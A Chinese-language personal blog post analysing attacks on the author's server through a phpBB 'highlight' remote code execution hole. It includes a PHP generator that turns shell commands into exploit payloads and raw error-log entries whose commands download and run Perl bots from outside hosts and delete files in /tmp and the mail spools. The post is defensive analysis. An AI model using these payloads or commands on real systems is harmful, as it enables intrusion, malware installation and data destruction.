crack 解析

最近光這個 Error URL 就不知道看過多少..
看了這個後還是要警惕自己.. 系統安全還是要小小維護一下...
最主要 要注意的是 MT 的 archives 不能給 cgi-bin 執行的權限..
這樣子就可以安心了~~ 🙂
原來這是 phpBB 的漏洞
升級後問題回報


產生轉換程式
<?php
while ( list($key,$val)=each($_POST)) {
echo "$key=$val
";
$$key=$val;
}
echo "<html><body><form method=POST action=./url.php><input type=text name=cmd value=\"\"><input type=submit name=smt1 value=\"轉換\"></form></body></html>\n";
if (isset($smt1)) {
echo "你輸入的 Cmd:$cmd<BR>\n";
$cmd_code=phpbb_code($cmd);
echo "&highlight=".$cmd_code."<BR>";
}
透過上面,你將 "cat ./config.php" 轉出來會為:
&highlight=%2527%252esystem(chr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(46)%252echr(47)%252echr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(105)%252echr(103)%252echr(46)%252echr(112)%252echr(104)%252echr(112))%252e%2527
function phpbb_code($cmd)
{
$str="%2527%252esystem(";
$chars = preg_split('//', $cmd, -1, PREG_SPLIT_NO_EMPTY);
$cnt=count($chars)-1;
for($i=0;$i<=$cnt;$i++) { if ($i==$cnt) $str=$str."chr(".ord($chars[$i])."))%252e"; else $str=$str."chr(".ord($chars[$i]).")%252e"; } $str=$str."%2527"; return $str; } ?> error.log 記錄的東西.. wget 抓的每個 session file 都是一隻 perl prgoram. 要存成 session file 並放在 tmp 主要是要讓你搞混用的.. /blog/archives/2004_04.html&rush=echo _START_; cd /tmp; rm -rf *; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611111; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611113; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112; perl sess_189f0f0889555397a4de5485dd611112; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611114; rm -rf *; cd /var/tmp/; rm -rf *; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611111; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611113; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112; perl sess_189f0f0889555397a4de5485dd611112; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611114; rm -rf *; cd /var/spool/mail/; rm -rf *; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611111; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611113; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112; perl sess_189f0f0889555397a4de5485dd611112; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611114; rm -rf *; cd/var/mail/; rm -rf *; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611111; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611113; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112; perl sess_189f0f0889555397a4de5485dd611112; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611114; rm -rf *; cd /usr/local/apache/proxy/; rm -rf *; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611111; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611113; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112; perl sess_189f0f0889555397a4de5485dd611112; wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611114; rm -rf *; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 又一個新的方式. 不過寫法比較簡潔. /blog/archives/2004_04.html&rush=echo _START_; killall -9 perl; cd /tmp; mkdir .temp22; cd .temp22; wget http://www.abcft.org/themes/bot.htm; wget http://http://weblicious.com/.notes/ssh2.htm; perl ssh2.htm; rm ssh.htm; perl bot.htm; rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27'; 這個比較聰明的寫法. 不過還是很爛 GET /~jon/blog/archives/cat_ae.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp; %20rm%20-rf%20*; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111; perl%20sess_189f0f0889555397a4de5485dd611111; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116; perl%20sess_189f0f0889555397a4de5485dd611116; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115; perl%20sess_189f0f0889555397a4de5485dd611115; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117; perl%20sess_189f0f0889555397a4de5485dd611117; rm%20-rf%20*; cd%20/var/tmp/;rm%20-rf%20*; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111; perl%20sess_189f0f0889555397a4de5485dd611111; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116; perl%20sess_189f0f0889555397a4de5485dd611116; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115; perl%20sess_189f0f0889555397a4de5485dd611115; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117; perl%20sess_189f0f0889555397a4de5485dd611117; rm%20-rf%20*; cd%20/var/spool/mail/; rm%20-rf%20*;wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111; perl%20sess_189f0f0889555397a4de5485dd611111; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116; perl%20sess_189f0f0889555397a4de5485dd611116; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115; perl%20sess_189f0f0889555397a4de5485dd611115; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117; perl%20sess_189f0f0889555397a4de5485dd611117; rm%20-rf%20*; cd%20/var/mail/;rm%20-rf%20*; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111; perl%20sess_189f0f0889555397a4de5485dd611111; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116; perl%20sess_189f0f0889555397a4de5485dd611116; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115; perl%20sess_189f0f0889555397a4de5485dd611115; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117; perl%20sess_189f0f0889555397a4de5485dd611117; rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/; rm%20-rf%20*;wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111; perl%20sess_189f0f0889555397a4de5485dd611111; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116; perl%20sess_189f0f0889555397a4de5485dd611116; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115; perl%20sess_189f0f0889555397a4de5485dd611115; wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117; perl%20sess_189f0f0889555397a4de5485dd611117; rm%20-rf%20*; killall%20-9%20wget%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%2 9.%2527 再來 archives/cat_ae.html&highlight=%27%2esystem(chr(105)%2echr(100)%2echr(59))%2e%27


關於 Tsung

對新奇的事物都很有興趣, 喜歡簡單的東西, 過簡單的生活.
本篇發表於 Program。將永久鏈結加入書籤。

發表迴響

這個網站採用 Akismet 服務減少垃圾留言。進一步瞭解 Akismet 如何處理網站訪客的留言資料